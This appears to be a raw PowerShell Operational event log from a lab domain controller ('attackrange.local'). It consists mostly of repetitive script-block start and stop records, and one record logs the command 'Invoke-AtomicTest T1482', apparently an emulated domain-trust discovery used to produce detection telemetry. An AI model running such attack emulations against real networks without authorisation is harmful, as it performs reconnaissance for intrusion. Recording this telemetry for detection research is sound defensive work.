Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477671
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477670
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477669
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477668
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477667
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477666
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477665
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477664
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477663
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477662
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477661
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477660
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477659
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477658
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477657
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477656
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477655
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477654
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477653
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477652
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477651
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477650
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477649
Keywords=None
Message=Completed invocation of ScriptBlock ID: b459aaab-de7d-420a-80f5-5c41c18dff6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477648
Keywords=None
Message=Started invocation of ScriptBlock ID: b459aaab-de7d-420a-80f5-5c41c18dff6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477647
Keywords=None
Message=Started invocation of ScriptBlock ID: 9977b850-34e8-42e4-a697-d3c6bfbce619
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477646
Keywords=None
Message=Completed invocation of ScriptBlock ID: 09cb335e-396f-45bc-bf57-1b3b9cd655fd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477645
Keywords=None
Message=Started invocation of ScriptBlock ID: 09cb335e-396f-45bc-bf57-1b3b9cd655fd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477644
Keywords=None
Message=Started invocation of ScriptBlock ID: 582fc7cf-f6b7-4da1-9e23-cc924416f8ba
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477643
Keywords=None
Message=Creating Scriptblock text (1 of 1):
Invoke-AtomicTest T1482

ScriptBlock ID: 582fc7cf-f6b7-4da1-9e23-cc924416f8ba
Path:
06/15/2021 05:05:55 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477642
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477920
Keywords=None
Message=Completed invocation of ScriptBlock ID: c89b68e5-1fd1-4b2a-91a1-3da245a7d27d
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477919
Keywords=None
Message=Started invocation of ScriptBlock ID: c89b68e5-1fd1-4b2a-91a1-3da245a7d27d
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477918
Keywords=None
Message=Completed invocation of ScriptBlock ID: bb618730-79f7-4207-874b-cd87502b4b74
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477917
Keywords=None
Message=Completed invocation of ScriptBlock ID: 72e9c98b-d670-48ec-8823-3d9664382c29
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477916
Keywords=None
Message=Started invocation of ScriptBlock ID: 72e9c98b-d670-48ec-8823-3d9664382c29
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477915
Keywords=None
Message=Completed invocation of ScriptBlock ID: 56247f67-87d2-473e-8b7d-7057a74b340e
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477914
Keywords=None
Message=Started invocation of ScriptBlock ID: 56247f67-87d2-473e-8b7d-7057a74b340e
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477913
Keywords=None
Message=Completed invocation of ScriptBlock ID: 01e02c41-9561-4a95-a89b-4e82453f43ed
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477912
Keywords=None
Message=Completed invocation of ScriptBlock ID: 03110519-7d37-44ee-b60c-60479c254ac7
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477911
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7744fa91-4e2b-4c0b-b31f-0c99a4b07a0d
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477910
Keywords=None
Message=Started invocation of ScriptBlock ID: 7744fa91-4e2b-4c0b-b31f-0c99a4b07a0d
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477909
Keywords=None
Message=Started invocation of ScriptBlock ID: 03110519-7d37-44ee-b60c-60479c254ac7
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477908
Keywords=None
Message=Started invocation of ScriptBlock ID: 01e02c41-9561-4a95-a89b-4e82453f43ed
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477907
Keywords=None
Message=Started invocation of ScriptBlock ID: bb618730-79f7-4207-874b-cd87502b4b74
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477906
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8b8d9ce5-9bbc-4943-9d8c-87bf66498064
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477905
Keywords=None
Message=Started invocation of ScriptBlock ID: 8b8d9ce5-9bbc-4943-9d8c-87bf66498064
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477904
Keywords=None
Message=Completed invocation of ScriptBlock ID: bb618730-79f7-4207-874b-cd87502b4b74
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477903
Keywords=None
Message=Completed invocation of ScriptBlock ID: 72e9c98b-d670-48ec-8823-3d9664382c29
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477902
Keywords=None
Message=Started invocation of ScriptBlock ID: 72e9c98b-d670-48ec-8823-3d9664382c29
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477901
Keywords=None
Message=Completed invocation of ScriptBlock ID: 56247f67-87d2-473e-8b7d-7057a74b340e
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477900
Keywords=None
Message=Started invocation of ScriptBlock ID: 56247f67-87d2-473e-8b7d-7057a74b340e
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477899
Keywords=None
Message=Completed invocation of ScriptBlock ID: 01e02c41-9561-4a95-a89b-4e82453f43ed
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477898
Keywords=None
Message=Completed invocation of ScriptBlock ID: 03110519-7d37-44ee-b60c-60479c254ac7
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477897
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7744fa91-4e2b-4c0b-b31f-0c99a4b07a0d
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477896
Keywords=None
Message=Started invocation of ScriptBlock ID: 7744fa91-4e2b-4c0b-b31f-0c99a4b07a0d
Runspace ID: 1aff8b99-d834-4746-bacc-fa5d8d5de137
06/15/2021 05:05:56 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
